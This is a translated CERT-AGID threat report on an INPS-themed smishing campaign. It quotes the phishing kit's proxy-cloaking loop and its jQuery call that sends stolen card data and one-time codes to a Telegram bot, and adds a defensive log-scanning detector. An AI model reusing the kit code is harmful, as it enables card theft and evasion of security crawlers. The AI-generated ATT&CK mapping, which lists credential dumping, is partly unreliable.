New INPS smishing exploits a Telegram bot as C2

Short Summary

A new smishing campaign targeting INPS is underway, aiming to steal victims’ credit card information and personal data such as name, surname, and tax code. The tactics, techniques, and procedures (TTPs) are well-orchestrated, notably utilizing a Telegram bot for Command and Control, a practice more commonly seen in malware operations.

Keypoints

  • Target: INPS (Italian National Social Security Institute)
  • Method: Smishing (SMS phishing)
  • Objective: Steal credit card and personal information
  • Use of a Telegram bot for Command and Control
  • Victims receive SMS claiming verification is needed for a payment
  • Fraudulent URL mimics the INPS portal
  • Attempts to bypass two-factor authentication (2FA)
  • Indicators of compromise (IoCs) shared via CERT-AGID

MITRE ATT&CK TTPs – created by AI

  • Phishing – T1566
    • Procedure: SMS phishing messages targeting victims to collect sensitive information.
  • Command and Control – T1071
    • Procedure: Use of a Telegram bot to send stolen data back to the attacker.
  • Credential Dumping – T1003
    • Procedure: Attempting to collect user credentials, including credit card information and 2FA codes.

Full Article Translation

22/08/2024

A new smishing campaign targeting INPS is underway, aiming to steal victims’ credit card information and personal data such as name, surname, and tax code. The TTPs are well-orchestrated, and the use of a Telegram bot for Command and Control is particularly notable, a practice more commonly used in malware operations.

Phishing home page

According to the user fr0$t who reported the campaign, victims are receiving an SMS with the following text:

To proceed with the payment of € 930.00 to your account, verification of the beneficiary’s identity is required.

The short URL present in the message points to a fraudulent address that replicates the INPS portal.

The landing page first checks whether the visitor is coming through a proxy: if a proxy is detected, the visitor is classified as a BOT and recorded as such; otherwise they are treated as a real user, and a view matching the user’s language is loaded (langview). This cloaking step means crawls made through datacenter or proxy egress see only the BOT branch.

setInterval(function() {
    // the kit polls a geolocation/IP lookup result stored in $scope.info_User
    if ($scope.info_User["country"]["proxy"] == true) {
        proxy = "BOT";   // proxy/VPN detected: visitor is tagged as a bot
        console.log(proxy);
    } else {
        proxy = "REAL";  // ordinary visitor: load the localized phishing view
        langview($scope.info_User['lang']);
    }
}); // the closing of the callback and the delay argument are missing from the captured snippet

After an initial form requesting basic details, a second page is loaded for entering credit card information:

Phishing second page

The phishing attempt also seeks to bypass two-factor authentication (2FA) by requesting the one-time code the bank sends via SMS, and then the victim’s IBAN.

Phishing third page

The backend server is hosted on a domain different from the one serving the landing page. Besides the data entered by the user, it also collects the victim’s IP address, browser, device, and operating system:

Victim information

jQuery is used to send a POST request to the Telegram API to communicate the stolen data to the bot acting as C2:

$.ajax({
    type: 'POST',
    // Telegram Bot API endpoint; `token` is the bot token hard-coded in the kit
    url: `https://api.telegram.org/bot${token}/sendMessage`,
    data: {
        chat_id: chatId,     // operator's chat that receives the stolen data
        text: message,       // victim data formatted as an HTML message
        parse_mode: 'html',
    },
    success: function (res) {
        // after the data is delivered, the victim is redirected to the card form
        setInterval(function() {
            console.log('okkkk');
            window.location.href = pathname + 'card.php';
        }, 3000);
    },
    error: function (error) {
        console.error(error);
        alert("error failed");
    }
});
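The jQuery call above makes the exfiltration channel easy to spot on the wire: a browser on a non-Telegram site issuing a POST to api.telegram.org/bot&lt;token&gt;/sendMessage. The following is an added example, not code from the CERT-AGID article or the kit, showing how a defender can flag that pattern in web-proxy logs and in captured kit source, while storing only a fingerprint of the bot token rather than the usable secret. The log format, the hostnames, the bot IDs and the tokens are all constructed for the example; the only real pieces are the public shape of the Telegram Bot API URL and the sendMessage method name.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Public shape of a Telegram Bot API URL: https://api.telegram.org/bot<bot_id>:<secret>/<method>
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<method>[A-Za-z]+)"
)

# Kit source usually builds the URL from a variable (bot${token}), so the static scan
# looks for the literal prefix plus the sendMessage/chat_id usage instead of a full token.
KIT_MARKERS = ("api.telegram.org/bot", "sendMessage", "chat_id")

# Constructed proxy log lines (not real traffic). Assumed format:
# "<timestamp> <client_ip> <method> <url> <referer-or-dash>"
SAMPLE_PROXY_LOG = """\
2024-08-22T10:01:05Z 10.0.0.15 GET https://www.inps.it/it/it.html -
2024-08-22T10:02:17Z 10.0.0.23 POST https://api.telegram.org/bot123456789:AAExampleExampleExampleExample12345/sendMessage https://inps-verifica.example/card.php
2024-08-22T10:02:40Z 10.0.0.23 GET https://inps-verifica.example/card.php -
2024-08-22T10:03:01Z 10.0.0.42 POST https://api.telegram.org/bot987654321:BBExampleExampleExampleExample67890/sendMessage -
"""

# Constructed fragment resembling a kit's exfiltration call (placeholder names only)
SAMPLE_KIT_JS = """
$.ajax({ type: 'POST',
  url: `https://api.telegram.org/bot${token}/sendMessage`,
  data: { chat_id: chatId, text: message, parse_mode: 'html' } });
"""


def fingerprint_token(bot_id, secret):
    """Non-reversible fingerprint: the IoC can be matched later without keeping a usable token."""
    digest = hashlib.sha256(f"{bot_id}:{secret}".encode()).hexdigest()
    return f"{bot_id}:sha256:{digest[:16]}"


def parse_proxy_line(line):
    """Parse one line of the assumed proxy format; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, referer = parts
    return {"ts": ts, "client": client, "method": method, "url": url,
            "referer": None if referer == "-" else referer}


def classify(event):
    """Return a finding if the request is a Telegram bot sendMessage call, else None."""
    m = TELEGRAM_BOT_RE.search(event["url"])
    if not m or m.group("method") != "sendMessage":
        return None
    ref_host = urlsplit(event["referer"]).hostname if event["referer"] else None
    # A browser on a third-party page posting to a bot is the exfiltration pattern the
    # INPS kit uses; a server-side integration normally sends no Referer at all.
    browser_origin = ref_host is not None and not ref_host.endswith("telegram.org")
    return {
        "ts": event["ts"],
        "client": event["client"],
        "bot": fingerprint_token(m.group("bot_id"), m.group("secret")),
        "referer_host": ref_host,
        "severity": "high" if browser_origin else "medium",
    }


def find_telegram_c2(log_text):
    """Scan proxy log text and return the list of Telegram-bot exfiltration findings."""
    hits = []
    for line in log_text.splitlines():
        event = parse_proxy_line(line)
        if event:
            finding = classify(event)
            if finding:
                hits.append(finding)
    return hits


def scan_kit_source(js_source):
    """Static check of captured page/kit JavaScript for the Telegram Bot API C2 pattern."""
    present = [marker for marker in KIT_MARKERS if marker in js_source]
    return {"uses_telegram_bot_api": len(present) == len(KIT_MARKERS), "markers": present}


if __name__ == "__main__":
    for hit in find_telegram_c2(SAMPLE_PROXY_LOG):
        print(hit)
    print(scan_kit_source(SAMPLE_KIT_JS))
```

The referer test is what separates the smishing kit's browser-side exfiltration from a legitimate server-side Telegram integration in the same logs; only the former carries a third-party page as its origin. The fingerprinted bot ID can be shared as an indicator without circulating a credential that would let anyone else read or post to the operator's channel.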

Indicators of Compromise

To make the details useful for countering this campaign, the detected indicators are listed below; they have already been disseminated through the CERT-AGID IoC Feed to all accredited public organizations.

Link: Download IoC

Source: Original Post